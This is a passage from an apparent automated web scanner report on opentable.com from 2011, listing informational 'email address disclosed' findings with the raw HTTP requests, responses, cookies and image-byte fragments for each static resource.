GIF89ay.C.............................:4....PH.......<6.wlf.....................................v..f.........!.......,....y.C.....'.di.'@LS..],.......|....*0+....!.l:..    rJENt..6K.z.2.vL...hjy..e4....i
...[SNIP]...
20.193. http://www.opentable.com/img/themes/normal/cnr_paleyellow_tl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/normal/cnr_paleyellow_tl.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/normal/cnr_paleyellow_tl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 111
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:41 GMT

GIF89a
.
........u....................v.....................!.......,....
.
....0H)L.`...LC.!G(b.wb....v.tD.;
20.194. http://www.opentable.com/img/themes/normal/cnr_paleyellow_tr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/normal/cnr_paleyellow_tr.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/normal/cnr_paleyellow_tr.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 111
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:43 GMT

GIF89a
.
........u..........................................!.......,....
.
......dJ.W.A....}...[.j.*....4...;
20.195. http://www.opentable.com/img/themes/normal/table-head-gradient-gray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/normal/table-head-gradient-gray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/normal/table-head-gradient-gray.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3671
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:37 GMT

.PNG
.
...IHDR.......L......-    ...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.196. http://www.opentable.com/img/themes/white/rest_profile_tabs.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/white/rest_profile_tabs.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/white/rest_profile_tabs.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1177
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:56 GMT

.PNG
.
...IHDR.............e${N....tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........................................................................................................................
...[SNIP]...
20.197. http://www.opentable.com/img/themes/white/table-head-gradient-gray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/white/table-head-gradient-gray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/white/table-head-gradient-gray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 319
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:57 GMT

.PNG
.
...IHDR.......L......-    ....tEXtSoftware.Adobe ImageReadyq.e<...{PLTE..........................................................................................................................
...[SNIP]...
20.198. http://www.opentable.com/img/themes/white/toplinecurve_980.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/white/toplinecurve_980.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/white/toplinecurve_980.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3892
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

GIF89a...................!.......,.............................H...........q..........
.....L*....    .J......j......".....N.........:U.........(8HXhxx.........)9IY.X........    jw.JZjz.....7..
.+;K[[.j...
...[SNIP]...
20.199. http://www.opentable.com/img/topten/Sprite_RatingStars_0-5.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/topten/Sprite_RatingStars_0-5.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/topten/Sprite_RatingStars_0-5.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1333
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:50 GMT

.PNG
.
...IHDR...6...7.......B....~PLTE.D#.P1.[?.gL.sZ.h..v..........................................................................................................rf...*tRNS.....................
...[SNIP]...
20.200. http://www.opentable.com/info/aboutus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/aboutus.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /info/aboutus.aspx HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; em=0; pgseq=; s_cc=true; s_nr=1317651726004-Repeat; s_sq=otrestref%3D%2526pid%253Dushome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.opentable.com%25252Finfo%25252Faboutus.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 14:21:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: restrefwhite=90; domain=.opentable.com; expires=Sat, 03-Oct-1981 07:00:00 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+17%3a21%3a38&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Vary: Accept-Encoding
Content-Length: 18801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head><link href="/styles/Normal/ot_style003.css?ver=Web_11_10_0_
...[SNIP]...
20.201. http://www.opentable.com/info/restaurateurs/img/arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/arrow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/arrow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 56
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:04 GMT

GIF89a......._JEXM9......!.......,..........    .a)!..P...;
20.202. http://www.opentable.com/info/restaurateurs/img/common/1x1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/common/1x1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/common/1x1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:02 GMT

GIF89a.............!.......,...........D..;
20.203. http://www.opentable.com/info/restaurateurs/img/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/loadingAnimation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/loadingAnimation.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 5886
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:44 GMT

GIF89a......................................................................................................!..NETSCAPE2.0.....!...
...,.......... .@Ri.h..l..p,.tm..#6N......+.r..rD4...h..@F.Cj.z]L.
...[SNIP]...
20.204. http://www.opentable.com/info/restaurateurs/img/restjoinus/btn_contactus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/btn_contactus.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/btn_contactus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 265
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:05 GMT

GIF89a~......................61......!.......,....~..........0.I.......`(.di.h.-...p,.tm.x../....p.......e........J].).*.n..m5.M6.\.5.M.cn......d3.....ryuw4qb..Gg?..omp~T.2..YJ.<.dkb~ru..v.c^H.;....w
...[SNIP]...
20.205. http://www.opentable.com/info/restaurateurs/img/restjoinus/btn_download.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/btn_download.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/btn_download.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 265
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:03 GMT

GIF89a~.......61.....................!.......,....~......H...0.I...)...`(.di.h.-...p,.tm.x../....p.......e.....4..Z..,LK.NePox9h
.U...^s..,...v.x.9.~...xcqy..Q}I{@.yw.Xl.....j...-D..nS.t~^....K.?..io
...[SNIP]...
20.206. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_lowerleft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/contactcorner_lowerleft.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/contactcorner_lowerleft.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 104
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:05 GMT

GIF89a.......................................................!.......,.............II.s...8...W'....l..;
20.207. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_lowerright.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/contactcorner_lowerright.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/contactcorner_lowerright.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 105
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:04 GMT

GIF89a.......................................................!.......,...........PI.....D.,.w....dhta...;
20.208. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_upperleft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/contactcorner_upperleft.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/contactcorner_upperleft.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
